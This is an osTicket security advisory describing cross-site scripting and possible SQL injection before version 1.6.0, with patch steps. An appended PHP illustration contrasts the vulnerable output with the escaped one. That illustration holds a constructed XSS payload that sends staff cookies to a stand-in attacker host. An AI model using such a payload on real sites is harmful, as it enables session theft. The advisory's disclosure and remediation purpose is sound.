
Issue Type SVA   Project osTicket Security Advisory
osTicket SVA-2010-209
Category Unknown
Affected Version 1.6 rc5
Priority 1 - Highest
Status fixed
Fixed Version 1.6.0 (Stable)
Submitted 02-09-2010
Assigned Users peter Tags (none)

issueid=176 02-09-2010 01:17 PM
Developer
osTicket SVA-2010-209

osTicket prior to v1.6.0 ST fails to properly handle and/or escape some user input before it is displayed or used. This could allow staff to unintentionally execute scripts or actions written by an attacker, resulting in arbitrary HTML and/or script injection (cross-site scripting) and possibly SQL injection. Staff-level authentication and activity is required to initiate the attacks.

The security risk is moderately critical and for this reason we strongly recommend upgrading to the latest version (osTicket v1.6 Stable) as soon as possible. If you are unable to upgrade immediately, you should patch your current installation until you are able to do a complete upgrade.

Below are instructions on how to temporarily patch osTicket v1.6 RC1-RC5:

* In scp/admin.php line 698
Replace
PHP Code:
 <font class="error">Problems loading requested admin page. (<?=$thistab?>)</font>
With
PHP Code:
 <font class="error">Problems loading requested admin page. (<?=Format::htmlchars($thistab)?>)</font>
* Download the attached zip file (sva-patch01.zip) and upload the 2 files enclosed.
Maintain the directory hierarchy so that the existing files are overwritten.

Full upgrade is strongly advised. To contact osTicket developers regarding security related issues or any concerns, please use the form at http://osticket.com/support/contact.php

Credit: Nahuel Grisolia - CEH nahuel.grisolia@gmail.com
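As an added illustration (not osTicket's code and not part of the advisory above), the following standalone PHP script reproduces the shape of the sink at scp/admin.php line 698 with a constructed payload, once with the raw interpolation and once with the escaped form. It assumes that $thistab originates from a request parameter and that Format::htmlchars() behaves like htmlspecialchars() with ENT_QUOTES; the html_escape() helper is a stand-in for it, not the project's implementation.

```php
<?php
// Added example, not osTicket's code: a reflected-XSS sink shaped like the
// one at scp/admin.php line 698, next to the escaped variant.
//
// Assumption: in the real application $thistab is derived from a request
// parameter controlled by whoever crafts the link a staff member clicks.
// Assumption: Format::htmlchars() behaves like htmlspecialchars() with
// ENT_QUOTES; html_escape() below is a stand-in for it.

function html_escape(string $s): string {
    // Escape &, <, >, " and ' so the value stays text inside HTML.
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Vulnerable: the request-controlled tab name is dropped into HTML unchanged.
function render_error_unsafe(string $thistab): string {
    return '<font class="error">Problems loading requested admin page. ('
        . $thistab . ')</font>';
}

// Fixed: the value is escaped before it reaches the HTML context.
function render_error_safe(string $thistab): string {
    return '<font class="error">Problems loading requested admin page. ('
        . html_escape($thistab) . ')</font>';
}

// Constructed payload, the sort an attacker would embed in a link sent to staff.
// Any hostnames are placeholders, not real infrastructure.
$payload = '"><script>document.location="http://attacker.example/?c="'
    . '+encodeURIComponent(document.cookie)</script>';

// Simulate the parameter arriving on the request (constructed input).
$thistab = $payload;

// The unsafe rendering emits a live <script> tag; the safe one emits
// &lt;script&gt;... and the browser shows it as harmless text.
echo "Unsafe output:\n", render_error_unsafe($thistab), "\n\n";
echo "Escaped output:\n", render_error_safe($thistab), "\n";

// Check the escaped form contains no raw tag delimiters from the payload.
if (strpos(render_error_safe($thistab), '<script') !== false) {
    fwrite(STDERR, "escaping failed\n");
    exit(1);
}
```

Escaping at the output point is the minimal fix the advisory applies; any other place where request data is echoed into staff-facing pages needs the same treatment, and the attached patch files are what cover the remaining locations.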

02-09-2010 01:45 PM
Issue Changed by peter
  • Attachment sva-patch01.zip uploaded
  • User assignments modified
